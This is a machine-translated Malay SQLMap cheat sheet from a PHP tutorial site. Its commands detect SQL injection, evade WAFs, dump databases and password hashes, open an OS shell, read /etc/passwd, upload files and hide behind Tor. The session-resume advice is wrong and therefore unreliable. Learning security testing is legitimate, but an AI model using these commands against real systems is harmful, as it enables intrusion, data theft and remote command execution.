Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik-Tutorial Python-php.cn

Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik

Linda Hamilton

Lepaskan： 2024-09-26 15:30:02

asal

989 orang telah melayarinya

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Pengarang: Trix Cyrus

Apakah itu SQLMap?
SQLMap ialah alat ujian penembusan sumber terbuka yang digunakan untuk mengesan dan mengeksploitasi kelemahan suntikan SQL dalam aplikasi web. Ia menyokong pelbagai sistem pangkalan data seperti MySQL, PostgreSQL, Oracle, Microsoft SQL Server dan banyak lagi.

Penggunaan Asas
Untuk bermula dengan SQLMap, anda boleh menjalankannya dalam bentuk yang paling mudah dengan menyediakan URL sasaran:

sqlmap -u "http://example.com/index.php?id=1"

Salin selepas log masuk

Arahan ini mengimbas URL sasaran untuk mencari kelemahan suntikan SQL.

1. Mengesan Kerentanan
Gunakan pilihan berikut untuk melakukan imbasan kelemahan asas dan mengesan titik suntikan SQL secara automatik:

sqlmap -u "http://example.com/index.php?id=1" --dbs

Salin selepas log masuk

--dbs: Menyenaraikan semua pangkalan data yang tersedia pada pelayan sasaran jika kelemahan ditemui.

2. Menentukan Permintaan POST

Untuk sasaran yang memerlukan permintaan POST (biasanya dalam borang log masuk), anda boleh menentukan data seperti ini:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"

Salin selepas log masuk

3. Memintas WAF dan Penapis

Untuk mengelak Tembok Api Aplikasi Web (WAF), SQLMap menyertakan teknik penyamaran muatan:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment

Salin selepas log masuk

--tamper: Menggunakan skrip tamper untuk mengelak penapis. Contoh: space2comment, charencode.

4. Mengekstrak Pangkalan Data, Jadual dan Lajur
Untuk mendapatkan senarai pangkalan data pada sistem sasaran:

sqlmap -u "http://example.com/index.php?id=1" --dbs

Salin selepas log masuk

Setelah pangkalan data dikenal pasti, ekstrak jadualnya:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

Salin selepas log masuk

Untuk mendapatkan lajur daripada jadual tertentu:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns

Salin selepas log masuk

5. Lambakan Data

Melambakkan kandungan jadual ialah salah satu ciri SQLMap yang paling berguna. Contohnya, untuk membuang semua data daripada jadual tertentu:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

Salin selepas log masuk

6. Menghitung Pengguna dan Kata Laluan Pangkalan Data

SQLMap juga boleh digunakan untuk menghitung pengguna pangkalan data dan juga memecahkan kata laluan cincang:

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords

Salin selepas log masuk

7. Mengakses Sistem Pengendalian

Dalam sesetengah kes, SQLMap boleh digunakan untuk melaksanakan arahan pada sistem pengendalian, terutamanya apabila pengguna pangkalan data mempunyai keistimewaan peringkat tinggi:

sqlmap -u "http://example.com/index.php?id=1" --os-shell

Salin selepas log masuk

Ini akan menyediakan shell interaktif di mana anda boleh melaksanakan arahan pada sistem sasaran.

8. Muat Naik Fail dan Bacaan

Anda juga boleh membaca fail daripada sistem sasaran atau memuat naik fail berniat jahat (jika dibenarkan):

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"

Salin selepas log masuk

9. Menggunakan Tor untuk Tanpa Nama

Untuk menyembunyikan identiti anda, anda boleh menjalankan SQLMap melalui rangkaian Tor:

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor

Salin selepas log masuk

--tor: Mendayakan Tor.
--check-tor: Mengesahkan jika sambungan dibuat melalui Tor.

10. Menyimpan dan Menyambung Semula

SQLMap membolehkan anda menyimpan dan menyambung semula kemajuan anda dengan menggunakan pilihan --session:

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name

Salin selepas log masuk

Kemudian, anda boleh menyambung semula sesi yang sama dengan:

sqlmap -r your_session_name

Salin selepas log masuk

11. Mod Verbose

Untuk melihat maklumat terperinci tentang perkara yang dilakukan oleh SQLMap:

sqlmap -u "http://example.com/index.php?id=1" -v 3

Salin selepas log masuk

Pilihan -v mengawal verbositi (tahap dari 0 hingga 6, dengan 6 menunjukkan semua butiran).

Imbasan Automatik untuk Berbilang Sasaran

SQLMap menyokong mengimbas berbilang URL yang disimpan dalam fail:

sqlmap -m urls.txt --batch

Salin selepas log masuk

--batch: Jawab semua gesaan secara automatik dengan pilihan lalai, berguna untuk pengimbasan automatik.

juga gunakan --risk=3 dan --level=5 untuk memajukan pengimbasan
Anda boleh menggunakan helaian cheat ini untuk memperkenalkan pembaca kepada arahan penting SQLMap dan membantu mereka bermula dengan ujian suntikan SQL.

~TrixSec

Atas ialah kandungan terperinci Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!